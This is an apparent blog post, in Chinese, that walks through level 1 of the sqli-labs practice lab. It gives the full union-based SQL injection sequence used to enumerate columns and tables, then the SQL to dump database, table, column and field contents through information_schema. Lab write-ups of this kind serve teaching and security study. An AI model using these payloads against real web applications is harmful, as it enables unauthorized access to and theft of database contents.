首页 > 数据库 >sqli-labs-Less-1

sqli-labs-Less-1

时间:2023-03-22 20:12:18浏览次数:42  
标签:Less -- Your labs sqli Password id select union

  • 主要工具:

hackbar,firefox、bp
  • Less-1
根据提示输入id(hackbar工具)
输入1成功
输入1'失败
错误信息You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

求闭合:
初步判断出为数字型
?id=1' and 1=1-- -成功
?id=1' and 1=2-- -失败

求列数
?id=1' and 1=1 order by 1-- -
?id=1' and 1=1 order by 1,2-- -
?id=1' and 1=1 order by 12,3-- -
?id=1' and 1=1 order by 1,2,3,4-- -
开始提示Unknown column '4' in 'order clause'
得出列数为3

爆显示位
?id=1' and 1=1 union select 1,2,3-- -
发现并没有显示,让前面的条件报错
?id=1' and 1=2 union select 1,2,3-- -
得到显示
Welcome    Dhakkan
Your Login name:2
Your Password:3

爆数据库
?id=1' and 1=2 union select 1,2,database()-- -
在显示位3处显示:
Your Password:security

爆表
?id=2' and 2=1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()-- - 
在显示位3处:
Your Password:emails,referers,uagents,users

爆列
?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database()-- -
在显示位3:Password:id,email_id,id,referer,ip_address,id,uagent,ip_address,username,id,username,password
在where加入and table_name='emails'......可以得出每个表有哪些列 
emails:Your Password:id,email_id

爆字段
' and 1=2 union select 1,2,group_concat(id,0x23,email_id,0x23) from emails-- -
得出所有信息0x23是分隔符

  

标签:Less,--,Your,labs,sqli,Password,id,select,union
From: https://www.cnblogs.com/Bin-go/p/17245287.html

相关文章

  • WP | 攻防世界supersqli
    今天在攻防世界平台上又搞了一道Web题——supersqli 1、进入题目所给的环境如下:2、页面显示一个提交框,直接判断注入类型(忽略判断是否有注入点——这个不用想)?injec......
  • sqli-labs-靶场搭建问题
    前提是将源文件解压到WWW目录下数据库密码错误mysqli_real_connect():(HY000/1045):Accessdeniedforuser'admin'@'localhost'(usingpassword:YES)打开文......
  • SpringMVC-lesson02-hellospringmvc-2023-03-21
    参考网页:https://www.kuangstudy.com/bbs/1618521039124783105第1步:注册web.xml,注册DispatcherServlet<?xmlversion="1.0"encoding="UTF-8"?><web-appxmlns="http:......
  • Wireless: SNR, RSSI信号强度
    rssi值多少为正常rssi值是通讯工程中的专业术语,它代表着无线网络的信号强度,rssi值一般是越大越好的。对于家用情况下的WIFI来说,信号强度-60到-70dBm之间算是信号很好的了......
  • 微服务过时了 - Serverless了解一下 | 技术专题第七期征文
    一、2020年的服务端革命你知道吗我们天天使用的石墨文档、微博、芒果TV都在全部或部分使用Serverless技术。其实知乎也是用的leancloud。技术的发展使我们有可能不花一分钱......
  • 玩转Serverless架构 概念篇+开发基础篇+开发进阶篇+场景案例篇
    你好,我是老蒋,一个在前端摸爬滚打7年的老兵,目前是国内某一线大厂的资深软件工程师。2017年国内Serverless技术刚刚兴起,我就开始使用和推广Serverless了,当时,我的团......
  • 《前端serverless 面向全栈的无服务器架构实战》读书笔记
    第1章什么是severless什么是NoOps利用自动化运维代替手工运维模式什么是severless开发者无需关注服务器资源配置情况、部署情况、操作系统以及依赖软件等在内等所有......
  • Serverless从入门到进阶:架构、原理与实践
    腾讯云Serverless项目早期参与者撰写,基于腾讯云、阿里云和亚马逊云等多个云厂商的产品和技术;从产品和技术两个维度展开,讲解Serverless的架构设计、技术原理、开发流程、......
  • S2 - Lesson 49 - The end of a dream
     Content TheendofadreamTiredofsleepingonthefloor,ayoungmaninTeheransavedupforyearstobuyarealbed.Forthefirsttimeinhislife,he......
  • SpringMVC-lesson01-servlet复习2-2023-03-20
    1、欢迎页设置在web文件夹下新建form.jsp:input的类型是text,名字是:method。一旦输入add或delete提交,就会到HelloServlet进行跳转<%--CreatedbyIntelliJI......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99